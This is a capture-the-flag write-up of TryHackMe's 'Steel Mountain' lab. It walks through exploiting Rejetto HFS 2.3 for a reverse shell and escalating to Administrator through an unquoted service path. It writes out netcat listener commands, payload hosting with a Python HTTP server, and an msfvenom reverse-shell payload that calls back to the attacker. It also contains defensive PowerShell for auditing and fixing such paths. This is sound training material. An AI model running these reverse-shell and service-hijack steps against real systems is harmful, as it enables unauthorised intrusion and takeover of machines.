Steel Mountain
Hack into a Mr. Robot themed Windows machine.
. . .

Introduction

In this room, we will enumerate a Windows machine, gain initial access with Metasploit, use PowerShell to further enumerate the machine and escalate our privileges to Administrator.

Target IP: 10.10.240.218

. . .

Scanning & Enumeration

Nmap Scan

root@fs0ci3ty:~# nmap -sV -A 10.10.240.218
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 15:55 IST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.64 seconds
root@fs0ci3ty:~# nmap -sV -A -Pn 10.10.240.218
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 15:55 IST
Nmap scan report for 10.10.240.218
Host is up (0.54s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2020-08-02T10:29:39+00:00; +7s from scanner time.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49161/tcp open  msrpc              Microsoft Windows RPC
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (87%)
OS CPE: cpe:/h:fortinet:fortigate_100d
Aggressive OS guesses: Fortinet FortiGate 100D firewall (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6s
| smb2-security-mode: 
|   3.00: 
|_    Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 443/tcp)
HOP RTT    ADDRESS
1   ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.28 seconds

We notice the following services:

  1. HTTP and
  2. Samba

Enumerate the Services

Version Enumeration Table

HTTP Enumeration

Landing Page

The landing page shows ‘Employee of the month’. I actually love the Mr. Robot series, so I know his name is Bill Harper. He was a victim of Elliot’s social engineering plan :P
To those who do not know who he is, do not worry.

View Source shows the name of the Employee

The next step in enumerating a web server is running gobuster, but that did not find anything on this server. So the next step is to move on to the other HTTP port, i.e. 8080.

HTTP File Server

The highlighted part is important because it tells us what software a particular server is running. On clicking ‘HttpFileServer 2.3’ we find that the server is using Rejetto HTTP File Server.

HTTP File Server Source Page

Now, before enumerating further: since this looks like off-the-shelf software rather than a custom application, we can jump straight to analysing whether this version of Rejetto HFS is vulnerable or not.

. . .

Vulnerability Analysis

A quick searchsploit suggests that we have multiple vulnerabilities for Rejetto.

searchsploit search results

We are more interested in remote code execution.

Search for remote exploits for Rejetto
Interesting Exploit on Exploit Database

Before we start exploitation, let us read the comments in the exploit.

Exploit Usage

Important note: we need to host nc.exe, essentially a netcat binary for Windows, on our attacker machine. Honestly, I missed this the first time.

I took a break, and when I came back with a fresh approach, I saw this.

. . .

Exploitation

Let us first get ‘nc.exe’.

A quick search provided me with a repo: https://github.com/int0x33/nc.exe?files=1

We follow these steps:

  1. Download ‘nc.exe’.
  2. Run an HTTP server using Python: sudo python3 -m http.server 80
     Note: we use sudo here because port 80 is a privileged port (below 1024), normally used by Apache; a normal user cannot bind a server to it.
  3. Next, we set up our netcat listener: nc -nlvp 4445
  4. Edit the exploit code to add the attacker’s IP address and the port our netcat listener is listening on.
  5. After that, we can run our ‘exploit.py’ using python exploit.py <target-ip>, several times if needed, until our shell pops up!

Modify the exploit script
Receiving the Reverse Shell

Once we get access to the base user, we can go ahead and grab our user.txt.

Shell with User Privileges
. . .

Privesc

Privesc on Windows is something I am not at all aware of. I do not know how it is done, or which direction to look into. So I am going to follow the method that TryHackMe points me to.

So they go on ahead and say that we need to put winPEAS.exe on the victim machine.

WinPEAS? What is that?


https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git

git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
Path for Obfuscated Binaries

I cloned this to get the WinPEAS executable. We could also compile it on our own, but for this part let us use the pre-compiled version.

Get the executable, and then start an HTTP server using: sudo python3 -m http.server 80

Make sure you start the python server where the executable is available.

Let us take a moment here and try to understand what we are going to do next.

When we run WinPEAS, it works just like LinEnum does on Linux: it enumerates the services, permissions and other information that we may be able to use to escalate our access.

According to TryHackMe,

further instructions

running winPEAS will point us towards unquoted service paths. Once again, what are UNQUOTED PATHS?


I googled the same and came across a nice blog by Orhan YILDIRIM which talks about unquoted paths on Windows here, and another one by Sumit Verma which can be found here.

Now that we have some clarity, let us continue where we stopped, drop our winPEAS on to the target, and get some juicy stuff!

Downloading winPEAS from attacker to target machine

Once we have our winPEAS on the target machine, let us run the executable and notice the output.

winPEAS output

This legend suggests that ‘Red’ is the color we need to look out for. Well, let’s do this.

Interesting results

We see three running services that have these two important highlights:

  1. No quotes and space detected
  2. File Permissions: Bill. We can read as well as write data.

Services:

  1. Advanced SystemCare
  2. IObit Uninstaller Service
  3. LiveUpdate

We also notice that the path for all three services starts from the same directory, i.e. ‘C:\Program Files (x86)\IObit’, so let us change our working directory to this path.

Three services show the same characteristics. Now that we know this, all we need to check is whether we can start, stop and restart any of these three services. We can check that using ‘icacls’.

Checking Permissions

Now that we know we have all the permissions, we can create a payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.4.9.255 LPORT=5555 -f exe -o Advanced.exe
Generating Payload

Let us upload it to the directory ‘C:\Program Files (x86)\IObit\’, so the path of our file is ‘C:\Program Files (x86)\IObit\Advanced.exe’. This helps us because the service’s binary path is unquoted and contains a space: when the service restarts, Windows tries ‘C:\Program Files (x86)\IObit\Advanced.exe’ before it ever looks inside the ‘Advanced SystemCare’ folder, so our Advanced.exe is executed instead of the real service binary.
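To make the unquoted-path condition concrete from the defender’s side, here is an added PowerShell example (my own code for this write-up, not from TryHackMe, winPEAS or the original post). It lists the candidate executables the Service Control Manager would try for an unquoted path, audits every service on the host for the same condition winPEAS flagged, checks whether the account running it could write to the candidate locations, and shows the fix, which is simply quoting the ImagePath. The function names are this example’s own; the IObit path at the bottom is built from the directory layout in the write-up, and its executable name ASCService.exe is an assumed placeholder since the real name is not shown above.

```powershell
# Added example: audit and fix unquoted service paths. Not code from the
# original write-up, TryHackMe or winPEAS. Function names are this example's
# own; the service path used at the bottom is constructed from the write-up
# and its executable name (ASCService.exe) is a placeholder.

function Get-UnquotedPathCandidates {
    # For an unquoted command line containing spaces, CreateProcess tries
    # each prefix that ends at a space (with .exe appended) before it reaches
    # the full path. Returns those candidates in the order Windows tries them.
    param([Parameter(Mandatory)][string]$PathName)

    $parts = $PathName -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $prefix = $parts[0..($i - 1)] -join ' '
        # Once the prefix is the real executable, the rest are arguments.
        if ($prefix -match '\.exe$') { break }
        $candidates += "${prefix}.exe"
    }
    return $candidates
}

function Test-DirectoryWritable {
    # True when one of the caller's SIDs is allowed CreateFiles (WriteData)
    # on $Path and no matching Deny ACE takes it away. Generic-rights ACEs
    # are not decoded here; confirm with icacls as the write-up does.
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string[]]$TokenSids
    )
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }

    $writeBit = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    $allowed = $false
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        try {
            $sid = $ace.IdentityReference.Translate(
                [System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }                      # orphaned or unresolvable SID
        if ($sid -notin $TokenSids) { continue }
        if (([int]$ace.FileSystemRights -band $writeBit) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Find-UnquotedServicePath {
    # One row per (service, hijack candidate). UserCanWrite is evaluated for
    # the account running this script, which is what matters for privesc.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $tokenSids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in Get-UnquotedPathCandidates $svc.PathName) {
                $dir = Split-Path -Path $candidate -Parent
                [pscustomobject]@{
                    Service      = $svc.Name
                    RunsAs       = $svc.StartName
                    ImagePath    = $svc.PathName
                    Candidate    = $candidate
                    UserCanWrite = Test-DirectoryWritable -Path $dir -TokenSids $tokenSids
                }
            }
        }
}

function Repair-UnquotedServicePath {
    # Remediation (needs administrator): quote the executable part of the
    # service's ImagePath registry value, keeping any arguments and the
    # value's registry type (usually REG_EXPAND_SZ).
    param([Parameter(Mandatory)][string]$Name)
    $key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $path = (Get-ItemProperty -LiteralPath $key -Name ImagePath).ImagePath
    if ($path -match '^(?<exe>[^"]*?\.exe)(?<args>.*)$') {
        $quoted = '"' + $Matches.exe + '"' + $Matches.args
    } else {
        throw "ImagePath of $Name is already quoted or has no .exe: $path"
    }
    $kind = (Get-Item -LiteralPath $key).GetValueKind('ImagePath')
    Set-ItemProperty -LiteralPath $key -Name ImagePath -Value $quoted -Type $kind
    return $quoted
}

# Worked example on the directory layout from the write-up (constructed path;
# the real executable name is not given there).
Get-UnquotedPathCandidates 'C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe'

# Live audit: only the rows where the current user could drop a file.
Find-UnquotedServicePath | Where-Object UserCanWrite | Format-Table -AutoSize
```

For the constructed path, the third candidate returned is ‘C:\Program Files (x86)\IObit\Advanced.exe’, which is exactly the file name the write-up drops; the first two candidates live in ‘C:\’, which a normal user cannot write to, so the IObit directory is the one that matters. Run the audit from the low-privileged shell (the Bill user here) to see what that account can reach; Repair-UnquotedServicePath needs an administrator prompt and takes effect the next time the service starts.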

Let us set up the listener on port 5555.

Then we stop the service using sc stop AdvancedSystemCareService9

And then we start it again using sc start AdvancedSystemCareService9

And bam! We have our admin shell!

Shell with Admin Privileges

We can now get our root.txt.

Root Flag
. . .

Parting Thoughts

We learned a new concept in this room for privesc. Also, I have not added the metasploit part here but just in case you are interested, here’s another blog that has that part covered here.

The main vulnerability was UNQUOTED PATHS.